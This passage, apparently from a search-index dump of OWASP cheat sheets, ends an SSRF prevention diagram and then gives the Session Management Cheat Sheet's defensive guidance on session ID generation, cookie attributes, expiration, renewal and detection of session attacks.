"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#tools-and-code-used-for-schemas","title":"Tools and code used for schemas","text":"

Mermaid code for SSRF common flow (printscreen are used to capture PNG image inserted into this cheat sheet):

sequenceDiagram\n    participant Attacker\n    participant VulnerableApplication\n    participant TargetedApplication\n    Attacker->>VulnerableApplication: Crafted HTTP request\n    VulnerableApplication->>TargetedApplication: Request (HTTP, FTP...)\n    Note left of TargetedApplication: Use payload included<br>into the request to<br>VulnerableApplication\n    TargetedApplication->>VulnerableApplication: Response\n    VulnerableApplication->>Attacker: Response\n    Note left of VulnerableApplication: Include response<br>from the<br>TargetedApplication\n

Draw.io schema XML code for the \"case 1 for network layer protection about flows that we want to prevent\" schema (printscreen are used to capture PNG image inserted into this cheat sheet).

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html","title":"Session Management Cheat Sheet","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Web Authentication, Session Management, and Access Control:

A web session is a sequence of network HTTP request and response transactions associated with the same user. Modern and complex web applications require the retaining of information or status about each user for the duration of multiple requests. Therefore, sessions provide the ability to establish variables \u2013 such as access rights and localization settings \u2013 which will apply to each and every interaction a user has with the web application for the duration of the session.

Web applications can create sessions to keep track of anonymous users after the very first user request. An example would be maintaining the user language preference. Additionally, web applications will make use of sessions once the user has authenticated. This ensures the ability to identify the user on any subsequent requests as well as being able to apply security access controls, authorized access to the user private data, and to increase the usability of the application. Therefore, current web applications can provide session capabilities both pre and post authentication.

Once an authenticated session has been established, the session ID (or token) is temporarily equivalent to the strongest authentication method used by the application, such as username and password, passphrases, one-time passwords (OTP), client-based digital certificates, smartcards, or biometrics (such as fingerprint or eye retina). See the OWASP Authentication Cheat Sheet.

HTTP is a stateless protocol (RFC2616 section 5), where each request and response pair is independent of other web interactions. Therefore, in order to introduce the concept of a session, it is required to implement session management capabilities that link both the authentication and access control (or authorization) modules commonly available in web applications:

The session ID or token binds the user authentication credentials (in the form of a user session) to the user HTTP traffic and the appropriate access controls enforced by the web application. The complexity of these three components (authentication, session management, and access control) in modern web applications, plus the fact that its implementation and binding resides on the web developer's hands (as web development frameworks do not provide strict relationships between these modules), makes the implementation of a secure session management module very challenging.

The disclosure, capture, prediction, brute force, or fixation of the session ID will lead to session hijacking (or sidejacking) attacks, where an attacker is able to fully impersonate a victim user in the web application. Attackers can perform two types of session hijacking attacks, targeted or generic. In a targeted attack, the attacker's goal is to impersonate a specific (or privileged) web application victim user. For generic attacks, the attacker's goal is to impersonate (or get access as) any valid or legitimate user in the web application.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-properties","title":"Session ID Properties","text":"

In order to keep the authenticated state and track the users progress within the web application, applications provide users with a session identifier (session ID or token) that is assigned at session creation time, and is shared and exchanged by the user and the web application for the duration of the session (it is sent on every HTTP request). The session ID is a name=value pair.

With the goal of implementing secure session IDs, the generation of identifiers (IDs or tokens) must meet the following properties.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-name-fingerprinting","title":"Session ID Name Fingerprinting","text":"

The name used by the session ID should not be extremely descriptive nor offer unnecessary details about the purpose and meaning of the ID.

The session ID names used by the most common web application development frameworks can be easily fingerprinted, such as PHPSESSID (PHP), JSESSIONID (J2EE), CFID & CFTOKEN (ColdFusion), ASP.NET_SessionId (ASP .NET), etc. Therefore, the session ID name can disclose the technologies and programming languages used by the web application.

It is recommended to change the default session ID name of the web development framework to a generic name, such as id.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-length","title":"Session ID Length","text":"

The session ID must be long enough to prevent brute force attacks, where an attacker can go through the whole range of ID values and verify the existence of valid sessions.

The session ID length must be at least 128 bits (16 bytes).

NOTE:

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-entropy","title":"Session ID Entropy","text":"

The session ID must be unpredictable (random enough) to prevent guessing attacks, where an attacker is able to guess or predict the ID of a valid session through statistical analysis techniques. For this purpose, a good CSPRNG (Cryptographically Secure Pseudorandom Number Generator) must be used.

The session ID value must provide at least 64 bits of entropy (if a good PRNG is used, this value is estimated to be half the length of the session ID).

Additionally, a random session ID is not enough; it must also be unique to avoid duplicated IDs. A random session ID must not already exist in the current session ID space.

NOTE:

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-content-or-value","title":"Session ID Content (or Value)","text":"

The session ID content (or value) must be meaningless to prevent information disclosure attacks, where an attacker is able to decode the contents of the ID and extract details of the user, the session, or the inner workings of the web application.

The session ID must simply be an identifier on the client side, and its value must never include sensitive information (or PII).

The meaning and business or application logic associated with the session ID must be stored on the server side, and specifically, in session objects or in a session management database or repository.

The stored information can include the client IP address, User-Agent, e-mail, username, user ID, role, privilege level, access rights, language preferences, account ID, current state, last login, session timeouts, and other internal session details. If the session objects and properties contain sensitive information, such as credit card numbers, it is required to duly encrypt and protect the session management repository.

It is recommended to use the session ID created by your language or framework. If you need to create your own sessionID, use a cryptographically secure pseudorandom number generator (CSPRNG) with a size of at least 128 bits and ensure that each sessionID is unique.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-management-implementation","title":"Session Management Implementation","text":"

The session management implementation defines the exchange mechanism that will be used between the user and the web application to share and continuously exchange the session ID. There are multiple mechanisms available in HTTP to maintain session state within web applications, such as cookies (standard HTTP header), URL parameters (URL rewriting \u2013 RFC2396), URL arguments on GET requests, body arguments on POST requests, such as hidden form fields (HTML forms), or proprietary HTTP headers.

The preferred session ID exchange mechanism should allow defining advanced token properties, such as the token expiration date and time, or granular usage constraints. This is one of the reasons why cookies (RFCs 2109 & 2965 & 6265) are one of the most extensively used session ID exchange mechanisms, offering advanced capabilities not available in other methods.

The usage of specific session ID exchange mechanisms, such as those where the ID is included in the URL, might disclose the session ID (in web links and logs, web browser history and bookmarks, the Referer header or search engines), as well as facilitate other attacks, such as the manipulation of the ID or session fixation attacks.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#built-in-session-management-implementations","title":"Built-in Session Management Implementations","text":"

Web development frameworks, such as J2EE, ASP .NET, PHP, and others, provide their own session management features and associated implementation. It is recommended to use these built-in frameworks versus building a home made one from scratch, as they are used worldwide on multiple web environments and have been tested by the web application security and development communities over time.

However, be advised that these frameworks have also presented vulnerabilities and weaknesses in the past, so it is always recommended to use the latest version available, that potentially fixes all the well-known vulnerabilities, as well as review and change the default configuration to enhance its security by following the recommendations described along this document.

The storage capabilities or repository used by the session management mechanism to temporarily save the session IDs must be secure, protecting the session IDs against local or remote accidental disclosure or unauthorized access.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#used-vs-accepted-session-id-exchange-mechanisms","title":"Used vs. Accepted Session ID Exchange Mechanisms","text":"

A web application should make use of cookies for session ID exchange management. If a user submits a session ID through a different exchange mechanism, such as a URL parameter, the web application should avoid accepting it as part of a defensive strategy to stop session fixation.

NOTE:

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#transport-layer-security","title":"Transport Layer Security","text":"

In order to protect the session ID exchange from active eavesdropping and passive disclosure in the network traffic, it is essential to use an encrypted HTTPS (TLS) connection for the entire web session, not only for the authentication process where the user credentials are exchanged. This may be mitigated by HTTP Strict Transport Security (HSTS) for a client that supports it.

Additionally, the Secure cookie attribute must be used to ensure the session ID is only exchanged through an encrypted channel. The usage of an encrypted communication channel also protects the session against some session fixation attacks where the attacker is able to intercept and manipulate the web traffic to inject (or fix) the session ID on the victim's web browser (see here and here).

The following set of best practices are focused on protecting the session ID (specifically when cookies are used) and helping with the integration of HTTPS within the web application:

See the OWASP Transport Layer Protection Cheat Sheet for more general guidance on implementing TLS securely.

It is important to emphasize that TLS does not protect against session ID prediction, brute force, client-side tampering or fixation; however, it does provide effective protection against an attacker intercepting or stealing session IDs through a man in the middle attack.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#cookies","title":"Cookies","text":"

The session ID exchange mechanism based on cookies provides multiple security features in the form of cookie attributes that can be used to protect the exchange of the session ID:

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#secure-attribute","title":"Secure Attribute","text":"

The Secure cookie attribute instructs web browsers to only send the cookie through an encrypted HTTPS (SSL/TLS) connection. This session protection mechanism is mandatory to prevent the disclosure of the session ID through MitM (Man-in-the-Middle) attacks. It ensures that an attacker cannot simply capture the session ID from web browser traffic.

Forcing the web application to only use HTTPS for its communication (even when port TCP/80, HTTP, is closed in the web application host) does not protect against session ID disclosure if the Secure cookie has not been set - the web browser can be deceived to disclose the session ID over an unencrypted HTTP connection. The attacker can intercept and manipulate the victim user traffic and inject an HTTP unencrypted reference to the web application that will force the web browser to submit the session ID in the clear.

See also: SecureFlag

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#httponly-attribute","title":"HttpOnly Attribute","text":"

The HttpOnly cookie attribute instructs web browsers not to allow scripts (e.g. JavaScript or VBscript) an ability to access the cookies via the DOM document.cookie object. This session ID protection is mandatory to prevent session ID stealing through XSS attacks. However, if an XSS attack is combined with a CSRF attack, the requests sent to the web application will include the session cookie, as the browser always includes the cookies when sending requests. The HttpOnly cookie only protects the confidentiality of the cookie; the attacker cannot use it offline, outside of the context of an XSS attack.

See the OWASP XSS (Cross Site Scripting) Prevention Cheat Sheet.

See also: HttpOnly

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#samesite-attribute","title":"SameSite Attribute","text":"

SameSite defines a cookie attribute preventing browsers from sending a SameSite flagged cookie with cross-site requests. The main goal is to mitigate the risk of cross-origin information leakage, and provides some protection against cross-site request forgery attacks.

See also: SameSite

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#domain-and-path-attributes","title":"Domain and Path Attributes","text":"

The Domain cookie attribute instructs web browsers to only send the cookie to the specified domain and all subdomains. If the attribute is not set, by default the cookie will only be sent to the origin server. The Path cookie attribute instructs web browsers to only send the cookie to the specified directory or subdirectories (or paths or resources) within the web application. If the attribute is not set, by default the cookie will only be sent for the directory (or path) of the resource requested and setting the cookie.

It is recommended to use a narrow or restricted scope for these two attributes. In this way, the Domain attribute should not be set (restricting the cookie just to the origin server) and the Path attribute should be set as restrictive as possible to the web application path that makes use of the session ID.

Setting the Domain attribute to a too permissive value, such as example.com allows an attacker to launch attacks on the session IDs between different hosts and web applications belonging to the same domain, known as cross-subdomain cookies. For example, vulnerabilities in www.example.com might allow an attacker to get access to the session IDs from secure.example.com.

Additionally, it is recommended not to mix web applications of different security levels on the same domain. Vulnerabilities in one of the web applications would allow an attacker to set the session ID for a different web application on the same domain by using a permissive Domain attribute (such as example.com) which is a technique that can be used in session fixation attacks.

Although the Path attribute allows the isolation of session IDs between different web applications using different paths on the same host, it is highly recommended not to run different web applications (especially from different security levels or scopes) on the same host. Other methods can be used by these applications to access the session IDs, such as the document.cookie object. Also, any web application can set cookies for any path on that host.

Cookies are vulnerable to DNS spoofing/hijacking/poisoning attacks, where an attacker can manipulate the DNS resolution to force the web browser to disclose the session ID for a given host or domain.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#expire-and-max-age-attributes","title":"Expire and Max-Age Attributes","text":"

Session management mechanisms based on cookies can make use of two types of cookies, non-persistent (or session) cookies, and persistent cookies. If a cookie presents the Max-Age (that has preference over Expires) or Expires attributes, it will be considered a persistent cookie and will be stored on disk by the web browser based until the expiration time.

Typically, session management capabilities to track users after authentication make use of non-persistent cookies. This forces the session to disappear from the client if the current web browser instance is closed. Therefore, it is highly recommended to use non-persistent cookies for session management purposes, so that the session ID does not remain on the web client cache for long periods of time, from where an attacker can obtain it.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#html5-web-storage-api","title":"HTML5 Web Storage API","text":"

The Web Hypertext Application Technology Working Group (WHATWG) describes the HTML5 Web Storage APIs, localStorage and sessionStorage, as mechanisms for storing name-value pairs client-side. Unlike HTTP cookies, the contents of localStorage and sessionStorage are not automatically shared within requests or responses by the browser and are used for storing data client-side.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#the-localstorage-api","title":"The localStorage API","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#scope","title":"Scope","text":"

Data stored using the localStorage API is accessible by pages which are loaded from the same origin, which is defined as the scheme (https://), host (example.com), port (443) and domain/realm (example.com). This provides similar access to this data as would be achieved by using the secure flag on a cookie, meaning that data stored from https could not be retrieved via http. Due to potential concurrent access from separate windows/threads, data stored using localStorage may be susceptible to shared access issues (such as race-conditions) and should be considered non-locking (Web Storage API Spec).

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#duration","title":"Duration","text":"

Data stored using the localStorage API is persisted across browsing sessions, extending the timeframe in which it may be accessible to other system users.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#offline-access","title":"Offline Access","text":"

The standards do not require localStorage data to be encrypted-at-rest, meaning it may be possible to directly access this data from disk.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#use-case","title":"Use Case","text":"

WHATWG suggests the use of localStorage for data that needs to be accessed across windows or tabs, across multiple sessions, and where large (multi-megabyte) volumes of data may need to be stored for performance reasons.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#the-sessionstorage-api","title":"The sessionStorage API","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#scope_1","title":"Scope","text":"

The sessionStorage API stores data within the window context from which it was called, meaning that Tab 1 cannot access data which was stored from Tab 2. Also, like the localStorage API, data stored using the sessionStorage API is accessible by pages which are loaded from the same origin, which is defined as the scheme (https://), host (example.com), port (443) and domain/realm (example.com). This provides similar access to this data as would be achieved by using the secure flag on a cookie, meaning that data stored from https could not be retrieved via http.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#duration_1","title":"Duration","text":"

The sessionStorage API only stores data for the duration of the current browsing session. Once the tab is closed, that data is no longer retrievable. This does not necessarily prevent access, should a browser tab be reused or left open. Data may also persist in memory until a garbage collection event.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#offline-access_1","title":"Offline Access","text":"

The standards do not require sessionStorage data to be encrypted-at-rest, meaning it may be possible to directly access this data from disk.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#use-case_1","title":"Use Case","text":"

WHATWG suggests the use of sessionStorage for data that is relevant for one-instance of a workflow, such as details for a ticket booking, but where multiple workflows could be performed in other tabs concurrently. The window/tab bound nature will keep the data from leaking between workflows in separate tabs.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#web-workers","title":"Web Workers","text":"

Web Workers run JavaScript code in a global context separate from the one of the current window. A communication channel with the main execution window exists, which is called MessageChannel.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#use-case_2","title":"Use Case","text":"

Web Workers are an alternative for browser storage of (session) secrets when storage persistence across page refresh is not a requirement. For Web Workers to provide secure browser storage, any code that requires the secret should exist within the Web Worker and the secret should never be transmitted to the main window context.

Storing secrets within the memory of a Web Worker offers the same security guarantees as an HttpOnly cookie: the confidentiality of the secret is protected. Still, an XSS attack can be used to send messages to the Web Worker to perform an operation that requires the secret. The Web Worker will return the result of the operation to the main execution thread.

The advantage of a Web Worker implementation compared to an HttpOnly cookie is that a Web Worker allows for some isolated JavaScript code to access the secret; an HttpOnly cookie is not accessible to any JavaScript. If the frontend JavaScript code requires access to the secret, the Web Worker implementation is the only browser storage option that preserves the secret confidentiality.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-life-cycle","title":"Session ID Life Cycle","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-generation-and-verification-permissive-and-strict-session-management","title":"Session ID Generation and Verification: Permissive and Strict Session Management","text":"

There are two types of session management mechanisms for web applications, permissive and strict, related to session fixation vulnerabilities. The permissive mechanism allows the web application to initially accept any session ID value set by the user as valid, creating a new session for it, while the strict mechanism enforces that the web application will only accept session ID values that have been previously generated by the web application.

The session tokens should be handled by the web server if possible or generated via a cryptographically secure random number generator.

Although the most common mechanism in use today is the strict one (more secure), PHP defaults to permissive. Developers must ensure that the web application does not use a permissive mechanism under certain circumstances. Web applications should never accept a session ID they have never generated, and in case of receiving one, they should generate and offer the user a new valid session ID. Additionally, this scenario should be detected as a suspicious activity and an alert should be generated.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#manage-session-id-as-any-other-user-input","title":"Manage Session ID as Any Other User Input","text":"

Session IDs must be considered untrusted, as any other user input processed by the web application, and they must be thoroughly validated and verified. Depending on the session management mechanism used, the session ID will be received in a GET or POST parameter, in the URL or in an HTTP header (e.g. cookies). If web applications do not validate and filter out invalid session ID values before processing them, they can potentially be used to exploit other web vulnerabilities, such as SQL injection if the session IDs are stored on a relational database, or persistent XSS if the session IDs are stored and reflected back afterwards by the web application.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#renew-the-session-id-after-any-privilege-level-change","title":"Renew the Session ID After Any Privilege Level Change","text":"

The session ID must be renewed or regenerated by the web application after any privilege level change within the associated user session. The most common scenario where the session ID regeneration is mandatory is during the authentication process, as the privilege level of the user changes from the unauthenticated (or anonymous) state to the authenticated state though in some cases still not yet the authorized state. Common scenarios to consider include; password changes, permission changes, or switching from a regular user role to an administrator role within the web application. For all sensitive pages of the web application, any previous session IDs must be ignored, only the current session ID must be assigned to every new request received for the protected resource, and the old or previous session ID must be destroyed.

The most common web development frameworks provide session functions and methods to renew the session ID, such as request.getSession(true) & HttpSession.invalidate() (J2EE), Session.Abandon() & Response.Cookies.Add(new...) (ASP .NET), or session_start() & session_regenerate_id(true) (PHP).

The session ID regeneration is mandatory to prevent session fixation attacks, where an attacker sets the session ID on the victim user's web browser instead of gathering the victim's session ID, as in most of the other session-based attacks, and independently of using HTTP or HTTPS. This protection mitigates the impact of other web-based vulnerabilities that can also be used to launch session fixation attacks, such as HTTP response splitting or XSS (see here and here).

A complementary recommendation is to use a different session ID or token name (or set of session IDs) pre and post authentication, so that the web application can keep track of anonymous users and authenticated users without the risk of exposing or binding the user session between both states.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#considerations-when-using-multiple-cookies","title":"Considerations When Using Multiple Cookies","text":"

If the web application uses cookies as the session ID exchange mechanism, and multiple cookies are set for a given session, the web application must verify all cookies (and enforce relationships between them) before allowing access to the user session.

It is very common for web applications to set a user cookie pre-authentication over HTTP to keep track of unauthenticated (or anonymous) users. Once the user authenticates in the web application, a new post-authentication secure cookie is set over HTTPS, and a binding between both cookies and the user session is established. If the web application does not verify both cookies for authenticated sessions, an attacker can make use of the pre-authentication unprotected cookie to get access to the authenticated user session (see here and here).

Web applications should try to avoid the same cookie name for different paths or domain scopes within the same web application, as this increases the complexity of the solution and potentially introduces scoping issues.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-expiration","title":"Session Expiration","text":"

In order to minimize the time period an attacker can launch attacks over active sessions and hijack them, it is mandatory to set expiration timeouts for every session, establishing the amount of time a session will remain active. Insufficient session expiration by the web application increases the exposure of other session-based attacks, as for the attacker to be able to reuse a valid session ID and hijack the associated session, it must still be active.

The shorter the session interval is, the lesser the time an attacker has to use the valid session ID. The session expiration timeout values must be set accordingly with the purpose and nature of the web application, and balance security and usability, so that the user can comfortably complete the operations within the web application without his session frequently expiring.

Both the idle and absolute timeout values are highly dependent on how critical the web application and its data are. Common idle timeouts ranges are 2-5 minutes for high-value applications and 15-30 minutes for low risk applications. Absolute timeouts depend on how long a user usually uses the application. If the application is intended to be used by an office worker for a full day, an appropriate absolute timeout range could be between 4 and 8 hours.

When a session expires, the web application must take active actions to invalidate the session on both sides, client and server. The latter is the most relevant and mandatory from a security perspective.

For most session exchange mechanisms, client side actions to invalidate the session ID are based on clearing out the token value. For example, to invalidate a cookie it is recommended to provide an empty (or invalid) value for the session ID, and set the Expires (or Max-Age) attribute to a date from the past (in case a persistent cookie is being used): Set-Cookie: id=; Expires=Friday, 17-May-03 18:45:00 GMT

In order to close and invalidate the session on the server side, it is mandatory for the web application to take active actions when the session expires, or the user actively logs out, by using the functions and methods offered by the session management mechanisms, such as HttpSession.invalidate() (J2EE), Session.Abandon() (ASP .NET) or session_destroy()/unset() (PHP).

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#automatic-session-expiration","title":"Automatic Session Expiration","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#idle-timeout","title":"Idle Timeout","text":"

All sessions should implement an idle or inactivity timeout. This timeout defines the amount of time a session will remain active in case there is no activity in the session, closing and invalidating the session upon the defined idle period since the last HTTP request received by the web application for a given session ID.

The idle timeout limits the chances an attacker has to guess and use a valid session ID from another user. However, if the attacker is able to hijack a given session, the idle timeout does not limit the attacker's actions, as they can generate activity on the session periodically to keep the session active for longer periods of time.

Session timeout management and expiration must be enforced server-side. If the client is used to enforce the session timeout, for example using the session token or other client parameters to track time references (e.g. number of minutes since login time), an attacker could manipulate these to extend the session duration.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#absolute-timeout","title":"Absolute Timeout","text":"

All sessions should implement an absolute timeout, regardless of session activity. This timeout defines the maximum amount of time a session can be active, closing and invalidating the session upon the defined absolute period since the given session was initially created by the web application. After invalidating the session, the user is forced to (re)authenticate again in the web application and establish a new session.

The absolute session limits the amount of time an attacker can use a hijacked session and impersonate the victim user.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#renewal-timeout","title":"Renewal Timeout","text":"

Alternatively, the web application can implement an additional renewal timeout after which the session ID is automatically renewed, in the middle of the user session, and independently of the session activity and, therefore, of the idle timeout.

After a specific amount of time since the session was initially created, the web application can regenerate a new ID for the user session and try to set it, or renew it, on the client. The previous session ID value would still be valid for some time, accommodating a safety interval, before the client is aware of the new ID and starts using it. At that time, when the client switches to the new ID inside the current session, the application invalidates the previous ID.

This scenario minimizes the amount of time a given session ID value, potentially obtained by an attacker, can be reused to hijack the user session, even when the victim user session is still active. The user session remains alive and open on the legitimate client, although its associated session ID value is transparently renewed periodically during the session duration, every time the renewal timeout expires. Therefore, the renewal timeout complements the idle and absolute timeouts, specially when the absolute timeout value extends significantly over time (e.g. it is an application requirement to keep the user sessions open for long periods of time).

Depending on the implementation, potentially there could be a race condition where the attacker with a still valid previous session ID sends a request before the victim user, right after the renewal timeout has just expired, and obtains first the value for the renewed session ID. At least in this scenario, the victim user might be aware of the attack as her session will be suddenly terminated because her associated session ID is not valid anymore.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#manual-session-expiration","title":"Manual Session Expiration","text":"

Web applications should provide mechanisms that allow security aware users to actively close their session once they have finished using the web application.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#logout-button","title":"Logout Button","text":"

Web applications must provide a visible and easily accessible logout (logoff, exit, or close session) button that is available on the web application header or menu and reachable from every web application resource and page, so that the user can manually close the session at any time. As described in Session_Expiration section, the web application must invalidate the session at least on server side.

NOTE: Unfortunately, not all web applications facilitate users to close their current session. Thus, client-side enhancements allow conscientious users to protect their sessions by helping to close them diligently.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#web-content-caching","title":"Web Content Caching","text":"

Even after the session has been closed, it might be possible to access the private or sensitive data exchanged within the session through the web browser cache. Therefore, web applications must use restrictive cache directives for all the web traffic exchanged through HTTP and HTTPS, such as the Cache-Control and Pragma HTTP headers, and/or equivalent META tags on all or (at least) sensitive web pages.

Independently of the cache policy defined by the web application, if caching web application contents is allowed, the session IDs must never be cached, so it is highly recommended to use the Cache-Control: no-cache=\"Set-Cookie, Set-Cookie2\" directive, to allow web clients to cache everything except the session ID (see here).

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#additional-client-side-defenses-for-session-management","title":"Additional Client-Side Defenses for Session Management","text":"

Web applications can complement the previously described session management defenses with additional countermeasures on the client side. Client-side protections, typically in the form of JavaScript checks and verifications, are not bullet proof and can easily be defeated by a skilled attacker, but can introduce another layer of defense that has to be bypassed by intruders.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#initial-login-timeout","title":"Initial Login Timeout","text":"

Web applications can use JavaScript code in the login page to evaluate and measure the amount of time since the page was loaded and a session ID was granted. If a login attempt is tried after a specific amount of time, the client code can notify the user that the maximum amount of time to log in has passed and reload the login page, hence retrieving a new session ID.

This extra protection mechanism tries to force the renewal of the session ID pre-authentication, avoiding scenarios where a previously used (or manually set) session ID is reused by the next victim using the same computer, for example, in session fixation attacks.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#force-session-logout-on-web-browser-window-close-events","title":"Force Session Logout On Web Browser Window Close Events","text":"

Web applications can use JavaScript code to capture all the web browser tab or window close (or even back) events and take the appropriate actions to close the current session before closing the web browser, emulating that the user has manually closed the session via the logout button.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#disable-web-browser-cross-tab-sessions","title":"Disable Web Browser Cross-Tab Sessions","text":"

Web applications can use JavaScript code once the user has logged in and a session has been established to force the user to re-authenticate if a new web browser tab or window is opened against the same web application. The web application does not want to allow multiple web browser tabs or windows to share the same session. Therefore, the application tries to force the web browser to not share the same session ID simultaneously between them.

NOTE: This mechanism cannot be implemented if the session ID is exchanged through cookies, as cookies are shared by all web browser tabs/windows.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#automatic-client-logout","title":"Automatic Client Logout","text":"

JavaScript code can be used by the web application in all (or critical) pages to automatically logout client sessions after the idle timeout expires, for example, by redirecting the user to the logout page (the same resource used by the logout button mentioned previously).

The benefit of enhancing the server-side idle timeout functionality with client-side code is that the user can see that the session has finished due to inactivity, or even can be notified in advance that the session is about to expire through a count down timer and warning messages. This user-friendly approach helps to avoid loss of work in web pages that require extensive input data due to server-side silently expired sessions.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-attacks-detection","title":"Session Attacks Detection","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-guessing-and-brute-force-detection","title":"Session ID Guessing and Brute Force Detection","text":"

If an attacker tries to guess or brute force a valid session ID, they need to launch multiple sequential requests against the target web application using different session IDs from a single (or set of) IP address(es). Additionally, if an attacker tries to analyze the predictability of the session ID (e.g. using statistical analysis), they need to launch multiple sequential requests from a single (or set of) IP address(es) against the target web application to gather new valid session IDs.

Web applications must be able to detect both scenarios based on the number of attempts to gather (or use) different session IDs and alert and/or block the offending IP address(es).

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#detecting-session-id-anomalies","title":"Detecting Session ID Anomalies","text":"

Web applications should focus on detecting anomalies associated to the session ID, such as its manipulation. The OWASP AppSensor Project provides a framework and methodology to implement built-in intrusion detection capabilities within web applications focused on the detection of anomalies and unexpected behaviors, in the form of detection points and response actions. Instead of using external protection layers, sometimes the business logic details and advanced intelligence are only available from inside the web application, where it is possible to establish multiple session related detection points, such as when an existing cookie is modified or deleted, a new cookie is added, the session ID from another user is reused, or when the user location or User-Agent changes in the middle of a session.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#binding-the-session-id-to-other-user-properties","title":"Binding the Session ID to Other User Properties","text":"

With the goal of detecting (and, in some scenarios, protecting against) user misbehaviors and session hijacking, it is highly recommended to bind the session ID to other user or client properties, such as the client IP address, User-Agent, or client-based digital certificate. If the web application detects any change or anomaly between these different properties in the middle of an established session, this is a very good indicator of session manipulation and hijacking attempts, and this simple fact can be used to alert and/or terminate the suspicious session.

Although these properties cannot be used by web applications to trustingly defend against session attacks, they significantly increase the web application detection (and protection) capabilities. However, a skilled attacker can bypass these controls by reusing the same IP address assigned to the victim user by sharing the same network (very common in NAT environments, like Wi-Fi hotspots) or by using the same outbound web proxy (very common in corporate environments), or by manually modifying his User-Agent to look exactly as the victim users does.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#logging-sessions-life-cycle-monitoring-creation-usage-and-destruction-of-session-ids","title":"Logging Sessions Life Cycle: Monitoring Creation, Usage, and Destruction of Session IDs","text":"

Web applications should increase their logging capabilities by including information regarding the full life cycle of sessions. In particular, it is recommended to record session related events, such as the creation, renewal, and destruction of session IDs, as well as details about its usage within login and logout operations, privilege level changes within the session, timeout expiration, invalid session activities (when detected), and critical business operations during the session.

The log details might include a timestamp, source IP address, web target resource requested (and involved in a session operation), HTTP headers (including the User-Agent and Referer), GET and POST parameters, error codes and messages, username (or user ID), plus the session ID (cookies, URL, GET, POST\u2026).

Sensitive data like the session ID should not be included in the logs in order to protect the session logs against session ID local or remote disclosure or unauthorized access. However, some kind of session-specific information must be logged in order to correlate log entries to specific sessions. It is recommended to log a salted-hash of the session ID instead of the session ID itself in order to allow for session-specific log correlation without exposing the session ID.

In particular, web applications must thoroughly protect administrative interfaces that allow to manage all the current active sessions. Frequently these are used by support personnel to solve session related issues, or even general issues, by impersonating the user and looking at the web application as the user does.

The session logs become one of the main web application intrusion detection data sources, and can also be used by intrusion protection systems to automatically terminate sessions and/or disable user accounts when (one or many) attacks are detected. If active protections are implemented, these defensive actions must be logged too.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#simultaneous-session-logons","title":"Simultaneous Session Logons","text":"

It is the web application design decision to determine if multiple simultaneous logons from the same user are allowed from the same or from different client IP addresses. If the web application does not want to allow simultaneous session logons, it must take effective actions after each new authentication event, implicitly terminating the previously available session, or asking the user (through the old, new or both sessions) about the session that must remain active.

It is recommended for web applications to add user capabilities that allow checking the details of active sessions at any time, monitor and alert the user about concurrent logons, provide user features to remotely terminate sessions manually, and track account activity history (logbook) by recording multiple client details such as IP address, User-Agent, login date and time, idle time, etc.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-management-waf-protections","title":"Session Management WAF Protections","text":"

